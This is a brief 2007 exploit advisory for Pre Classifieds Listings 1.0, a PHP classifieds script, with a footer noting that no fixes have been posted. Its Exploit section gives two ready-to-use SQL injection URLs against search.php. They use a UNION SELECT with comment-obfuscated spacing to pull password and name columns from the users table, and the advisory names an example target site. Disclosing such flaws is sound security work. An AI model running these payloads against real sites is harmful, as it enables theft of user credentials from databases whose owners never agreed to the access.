Pre Classifieds Listings 1.0 Remote SQL Injection Vulnerability

2007-05-03 00:00:00

==============================================

Pre Classifieds Listings v1.0 Remote SQL Injection

==============================================

Found: Cyber-Security.org

==============================================

Exploit:
search.php?category=-1/**/union/**/select/**/pass/**/from/**/users/*
search.php?category=-1/**/union/**/select/**/name/**/from/**/users/*

==============================================

Example: http://preproject.com/phppcl/

==============================================

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.